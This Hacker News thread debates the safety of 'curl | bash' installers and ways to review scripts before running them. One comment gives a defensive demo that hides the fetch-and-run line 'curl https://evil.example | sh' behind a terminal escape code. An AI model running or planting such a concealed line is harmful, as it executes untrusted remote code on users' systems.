pxeger1 · a month ago
My problem with curl|bash is not that the script might be malicious - the software I'm installing could equally be malicious. It's that it may be written incompetently, or just not with users like me in mind, and so the installation gets done in some broken, brittle, or non-standard way on my system. I'd much rather download a single binary and install it myself in the location I know it belongs in.
jerf · a month ago
I've also seen really wonderfully-written scripts that, if you read them manually, allow you to change where whatever it is is installed, what features it may have, optional integration with Python environments, or other things like that.

I at least skim all the scripts I download this way before I run them. There are all kinds of reasons to, ranging from "is this malicious?" to "does this have options they're not telling me about that I want to use?"

A particular example is that I really want to know if you're setting up something that integrates with my distro's package manager or just yolo'ing it somewhere into my user's file system, and if so, where.
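
Concretely, the pattern looks something like this (the `PREFIX` override is hypothetical; whether a script honors one, and what it's called, varies per project):

    curl -fsSL https://example.com/install.sh -o install.sh
    less install.sh                         # skim for options, install paths, sudo use
    PREFIX="$HOME/.local" bash install.sh   # hypothetical override; check the script for its real knobs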

AndyMcConachie · a month ago
100% agree. The question of whether I should install lib-X for language-Y using Y's package management system or the distribution's package management system is unresolved.
inetknght · a month ago
> I've also seen really wonderfully-written scripts that

I'll take a script that passes `shellcheck ./script.sh` (or, any other static analysis) first. I don't like fixing other people's bugs in their installation scripts.

After that, it's an extra cherry on top to have everything configurable. Things that aren't configurable go into a container and I can configure as needed from there.

sim7c00 · a month ago
right? read before you run. if you can't make sense of it all, don't run it. if you can make sense of it all, you're free to refactor it to your own taste :) usually saves some time. as you say, a lot of them are quite nicely written
mingus88 · a month ago
My problem with it is that it encourages unsafe behavior.

How many times will a novice user follow that pattern before some jerk on Discord drops a malicious curl|bash and gets hits?

IRC used to be a battlefield for these kinds of tricks, and we have legit projects like homebrew training users that it's normal to raw-dog arbitrary code directly into your environment

SkiFire13 · a month ago
What would you consider a safer behaviour for downloading programs from the internet?
troupo · a month ago
> My problem with it is that it encourages unsafe behavior.

Then why don't Linux distributions encourage safe behaviour? Why do you still need sudo permissions to install anything on most Linux systems?

> How many times will a novice user follow that pattern until some jerk on discord

I'm not a novice user and I will use this pattern because it's frankly easier and faster, especially when the current distro doesn't have some combination of things installed, or doesn't have certain packages, or...

IgorPartola · a month ago
This exactly. You never know what it will do. Will it simply check that you have Python and virtualenv and install everything into a single directory? Or will it hijack your system by adding trusted remote software repositories? Will it create new users? Open network ports? Install an old version of Java it needs? Replace system binaries for “better” ones? Install Docker?

Operating systems already have standard ways of distributing software to end users. Use them! Sure, maybe it takes a little extra time to do the one-off task of adding the ability to build Debian packages, RPMs, etc., but at least your software will coexist nicely with everything else. Or if your software is such a prima donna that it needs its own OS image, package it in a Docker container. But really, just stop trying to reinvent the wheel (literally).
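
For Debian-family systems the one-off task really is small; a minimal sketch (package name and paths are illustrative):

    mkdir -p mytool_1.0_amd64/DEBIAN mytool_1.0_amd64/usr/bin
    cp mytool mytool_1.0_amd64/usr/bin/
    # DEBIAN/control holds the required metadata fields
    printf 'Package: mytool\nVersion: 1.0\nArchitecture: amd64\nMaintainer: Example <maintainer@example.com>\nDescription: Example tool packaged for apt\n' > mytool_1.0_amd64/DEBIAN/control
    dpkg-deb --build mytool_1.0_amd64   # produces mytool_1.0_amd64.deb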

stouset · a month ago
Yes! What I really want from something like this is sandboxing the install process to give me a guaranteed uninstall process.
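
A crude approximation you can do today (not a real sandbox; it only catches installers that stay inside `$HOME`):

    mkdir -p /tmp/throwaway-home
    HOME=/tmp/throwaway-home bash install.sh   # user-level installers usually write under $HOME
    find /tmp/throwaway-home -type f           # inventory of everything it installed
    rm -rf /tmp/throwaway-home                 # the "guaranteed uninstall"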
mjmas · a month ago
tinycorelinux reinstalls its extensions into a tmpfs every boot which works nicely. (and you can have different lists of extensions that get loaded)
hsbauauvhabzb · a month ago
Why would you possibly want to remove my software?
1vuio0pswjnm7 · a month ago
Many times a day, both in scripts and interactively, I use a small program I refer to as "yy030" that filters URLs from stdin. It's a bit like "urlview" but uses less complicated regexes and is faster. There is no third-party software I use that is distributed via "curl|bash", and in practice I do not use curl or bash; however, if I did, I might use yy030 to extract any URLs from install.sh, something like this:

    curl https://example.com/install.sh|yy030
or

    curl https://example.com/install.sh > install.sh
    yy030 < install.sh
Another filter, "yy073", turns a list of URLs into a simple web page. For example,

    curl https://example.com/install.sh|yy030|yy073 > 1.htm
I can then open 1.htm in an HTML reader and select any file for download or processing by any program according to any file associations I choose, somewhat like "urlview".

I do not use "fzf" or anything like that. yy030 and yy073 are small static binaries under 50k that compile in about 1 second.

I also have a tiny script that downloads a URL received on stdin. For example, to download the third URL from install.sh to 1.tgz

     yy030 < install.sh|sed -n 3p|ftp0 1.tgz
"ftp" means the client is tnftp

"0" means stdin

nikisweeting · a month ago
This is always the beef that I've had with it. Particularly the lack of automatic updates and enforced immutable monotonic public version history. It leads to each program implementing its own non-standard self-updating logic instead of just relying on the system package managers. https://docs.sweeting.me/s/against-curl-sh
shadowgovt · a month ago
Much of the reason `curl | bash` grew up in the Linux ecosystem is that the "single binary that just runs" approach isn't really feasible (1) because the various distros themselves don't adhere to enough of a standard to support it. Windows and macOS, being mono-vendor, have a sufficiently standardized configuration that install tooling that just layers a new application into your existing ecosystem is relatively straightforward: they're not worrying about what audio subsystem you installed, or what side of the systemd turf war your distro landed on, or which of three (four? five?) popular desktop environments you installed, or whether your `/dev` directory is fully populated. There's one answer for the equivalent of all those questions on Mac and Win, so shoving some random binary in there Just Works.

Given the jungle that is the Linux ecosystem, that bash script is doing an awful lot of compatibility verification and alternatives selection to stand up the tool on your machine. And if what you mean is "I'd rather they hand me the binary blob and I just hook it up based on a manifest they also provided," most people do not want to do that level of configuration, not when there are two OS ecosystems out there that Just Work. They understandably want their Linux distro to Just Work too.

(1) feasible traditionally. Projects like snap and flatpak take a page from the success Docker has had and bundle the executable with its dependencies, so it no longer has to worry about what special snowflake your "home" distro is; it's carrying all the audio / system / whatever dependencies it relies upon with it. Mostly. And at the cost of having all these redundant tech stacks resident on disk and in memory, and only consolidatable if two packages are children of the same parent image.

fouc · a month ago
I first encountered `curl | bash` in the macOS world, specifically when installing the worst package manager ever, homebrew, which first came out in 2009. Since then it's spread.

I call it the worst because it doesn't support installing specific versions of libraries, doesn't support downgrading, etc. It's basically hostile and forces you to constantly upgrade everything, which invariably leads to breaking a dependency and wasting time fixing that.

These days I mostly use devbox / nix at the global level and mise (asdf compatible) at the project level.

JoshTriplett · a month ago
Statically link a binary with musl, and it'll work on the vast majority of systems.
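
For example, with a pure-Rust tool (the binary name `mytool` is a placeholder):

    rustup target add x86_64-unknown-linux-musl
    cargo build --release --target x86_64-unknown-linux-musl
    file target/x86_64-unknown-linux-musl/release/mytool   # reports "statically linked"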

> they're not worrying about what audio subsystem you installed

Some software solves this by autodetecting an appropriate backend, but also, if you use ALSA, modern audio systems will intercept that automatically.

> what side of the systemd turf war your distro landed on

Most software shouldn't need to care, but to the extent it does, these days there's systemd and there's "too idiosyncratic to support and unlikely to be a customer". Every major distro picked the former.

> or which of three (four? five?) popular desktop environments you installed

Again, most software shouldn't care. And `curl|bash` doesn't make this any easier.

> or whether your `/dev` directory is fully-populated

You can generally assume the devices you need exist, unless you're loading custom modules, in which case it's the job of your modules to provide the requisite metadata so that this works automatically.

networked · a month ago
You can also use vipe from moreutils:

  curl -sSL https://example.com/install.sh | vipe | sh
This will open the output of the curl command in your editor and let you review and modify it before passing it on to the shell. If it seems shady, clear the text.

vet looks safer. (Edit: It has the diff feature and defaults to not running the script. However, it also doesn't display a new script for review by default.) The advantage of vipe is that you probably have moreutils available in your system's package repositories or already installed.
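
You can approximate the diff feature by hand, too; a rough sketch (file names are illustrative):

    curl -fsSL https://example.com/install.sh -o install.sh.new
    diff -u install.sh.old install.sh.new   # empty diff: unchanged since your last review
    less install.sh.new                     # otherwise, review what changed before running it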

TZubiri · a month ago
Huh

Why not just use the tools separately instead of bringing in a third tool for this?

    curl -o script.sh https://example.com/install.sh
    cat script.sh
    bash script.sh

What a concept.

networked · a month ago
What it comes down to is that people want a one-liner. Telling them they shouldn't use a one-liner doesn't work. Therefore, it is better to provide a safer one-liner.

This assumes that securing `curl | sh` separately from the binaries and packages the script downloads makes sense. I think it does. Theoretically, someone can compromise your site http://example.com with the installation script https://example.com/install.sh but not your binary downloads on GitHub. Reviewing the script lets the user notice that, for example, the download is not coming from the project's GitHub organization.
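
A quick way to spot that during review is to list every URL the script touches, e.g.:

    curl -fsSL https://example.com/install.sh -o install.sh
    grep -Eo 'https?://[^"[:space:]]+' install.sh | sort -u   # every host the script downloads from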

bawolff · a month ago
If you are really paranoid you should use cat -v, as otherwise terminal control characters can hide the malicious part of the script.
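
A toy demonstration (this uses the SGR "conceal" escape code, which not every terminal honors):

    printf 'echo harmless \033[8m; curl https://evil.example | sh \033[0m\n' > demo.sh
    cat demo.sh      # on a supporting terminal, the concealed middle part is invisible
    cat -v demo.sh   # shows: echo harmless ^[[8m; curl https://evil.example | sh ^[[0m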
panki27 · a month ago
At this point, the whole world is just a complexity Olympiad
adolph · a month ago
Same, but less instead of cat, so my fingers stay on the keyboard.

vet, vipe, etc. are kind of like kitchen single-taskers, like avocado slicer-scoopers. Surely some people get great value out of them, but a table knife works just fine for me and is useful in many task flows.

I'd get more value out of a cross-platform copy-paster so I'm not skip-stepping in my mind between pbpaste and xclip.

jjgreen · a month ago
Splendid idea, especially since "curl | bash" can be detected on the server [1] (which, if compromised, could serve hostile content only to those who do it)

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab · a month ago
This is one of those theoretical issues that has absolutely no practical implications.
dgl · a month ago
Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern; less -U or cat -v is what you want).
falcor84 · a month ago
Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.
sim7c00 · a month ago
depending on what you run, one method might have more success than another. protections against malicious scripts vs. modified binaries are often different tools, or different components of the same tool, with varying degrees of success.

you could also use the script to fingerprint and beacon home, to check whether the target is worth it and what you might want to inject into said binary, if that's your pick.

still, i think i agree: if you're going to trust a binary from that server or its scripts, it's potato, potahto...

check what you run before you run it, with whatever tools or skills you've got, and hope for the best.

if you go deep enough into this rabbit hole, you can't trust your hard disk or network card etc., so at some point it's just impossible to do anything. microcode patches, malicious firmware, whatever.

for pragmatic reasons a line needs to be drawn. if you're paranoid, good luck and don't learn too much about cybersecurity, or you will need to build your own computer :p

baq · a month ago
we've been curl | bashing software on windows since forever; it was called 'downloading and running an installer', and yes, there was the occasional malware. the solution to that was antivirus software. at this point even the younger HNers should see how the wheel of history turns.

meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

inanutshellus · a month ago
> meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

Well... sometimes like, say, yesterday [1], there's a second thought...

  [1] https://www.bleepingcomputer.com/news/security/npm-package-is-with-28m-weekly-downloads-infected-devs-with-malware/

simonw · a month ago
"the solution to that was antivirus software"

How well did that work out?

thewebguyd · a month ago
> How well did that work out?

Classic old school antivirus? Not great, but did catch some things.

Modern EDR systems? They work extremely well when properly set up and configured across a fleet of devices as it's looking for behavior and patterns instead of just going off of known malware signatures.

bongodongobob · a month ago
As someone who manages 1000s of devices, great.
esafak · a month ago
Great. It motivated me to drop-kick Windows and move to Linux and macOS.
Cthulhu_ · a month ago
"everyone else" is using an app store that has (read: should have) vetted and reviewed applications.
tonymet · a month ago
windows has had ACLs and security descriptors for 20+ years. Linux is a superuser model.

Windows Store installs (about 75% of installs) are sandboxed and no longer need escalation.

The remaining privileged installs that prompt with UAC modal are guarded by MS Defender for malicious patterns.

Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo gives access to almost all memory, raw devices, and anywhere on disk.

eredengrin · a month ago
> Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

They didn't say anything about sudo, so assuming global filesystem/memory/device/etc access is not really a fair comparison. Many installers that come as bash scripts don't require root. There are definitely times I examine installer scripts before running them, and sudo is a pretty big determining factor in how much examination an installer will get from me (other factors include the reputation of the project, past personal experience with it, whether I'm running it in a vm or container already, how I feel on the day, etc).

ndsipa_pomu · a month ago
At least with curl and bash, the code is human-readable, so it's easy to inspect as long as you have some basic knowledge of bash scripts.
fragmede · a month ago
software running in docker's a bit more sandboxed than running outside of it, even if it's not bulletproof.
johnfn · a month ago
Am I missing something? Even if you do `vet foobar-downloader.sh` instead of `curl foobar-downloader.sh | bash`, isn't your next command going to be to execute `foobar` regardless, "blindly trusting" that all the source in the `foobar` repository isn't compromised, etc?
lr0 · a month ago
No, it says that it will show you the script first so you can review it. What I don't get is why you need a program for this; you can simply curl the script to a file, `cat` it, and review it.
simonw · a month ago
It shows you the installation script but that doesn't help you evaluate if the binary that the script installs is itself safe to run.
geysersam · a month ago
Yes, but even if you inspect the code of the installation script, the program you just installed might still be compromised/malicious. It doesn't seem any more likely that an attacker compromised the installation script than that they compromised the released binary itself.
loloquwowndueo · a month ago
If you’re just going to run it blindly, you don’t need vet. It’s not automatic; it just gives you a chance to review the script before running it.
Galanwe · a month ago
The whole point of "curl|bash" is to skip the dependency on package managers and install on a barebones machine. Installing a tool that lets you install tools without an installation tool is...
chii · a month ago
but then it needs to come with a curl|bash uninstall tool. Most of these install scripts are just half the story, and the uninstalling part doesn't exist.
ryandrake · a month ago
Sadly, a great many 3rd party developers don't give a single shit about uninstallation, and won't lift a finger to do it cleanly, correctly and completely. If their installer/packager happens to do it, great, but they're not going to spend development cycles making it wonderful.
jrpear · a month ago
For those install scripts which allow changing the install prefix (e.g. autoconf projects, though those involve a build step too), I've found GNU Stow to be a good solution to the uninstall situation. Install into `/usr/local/stow` or `~/.local/stow`, then have Stow set up symlinks to the final locations. Uninstall with `stow --delete`.
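
A sketch of that workflow (package name illustrative):

    ./configure --prefix="$HOME/.local/stow/mytool-1.0"
    make && make install
    cd ~/.local/stow
    stow mytool-1.0            # symlinks the files into ~/.local/bin, ~/.local/share, ...
    stow --delete mytool-1.0   # clean uninstall: removes only the symlinks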
ndsipa_pomu · a month ago
Most of the time I've seen curl|bash, it is to add a repository source to the package manager (debian/ubuntu).
nikisweeting · a month ago
this is the only sane way to do it; curl|sh should just automate the package manager commands
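
On Debian/Ubuntu those scripts usually boil down to something like this (URLs and names illustrative), which you can just as well run yourself:

    curl -fsSL https://example.com/key.gpg | sudo gpg --dearmor -o /usr/share/keyrings/example.gpg
    echo "deb [signed-by=/usr/share/keyrings/example.gpg] https://apt.example.com stable main" \
      | sudo tee /etc/apt/sources.list.d/example.list
    sudo apt update && sudo apt install mytool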
jrm4 · a month ago
As an old-timer going through this thread, I must say there's just not enough hate for the whole Windows/macOS inclination to not let users be experimental.

Everyone here is sort of caught up in this weird middle ground, where you're expecting an environment that is both safe and experimental, but the two dominant OSes do EVERYTHING THEY CAN to kill the latter, which, funnily enough, can also make the former worse.

Do not forget: for years you have been in a world in which Apple and Microsoft do not want you to have any real power.

aezart · a month ago
I think aside from any safety issues, another reason to prefer a deb or something over curl | bash is that it lets your package manager know what you're installing. It can warn you about unmet dependencies, it knows where all the individual components are installed, etc. When I see a deb I feel more confident that the software will play nicely with other stuff on the system.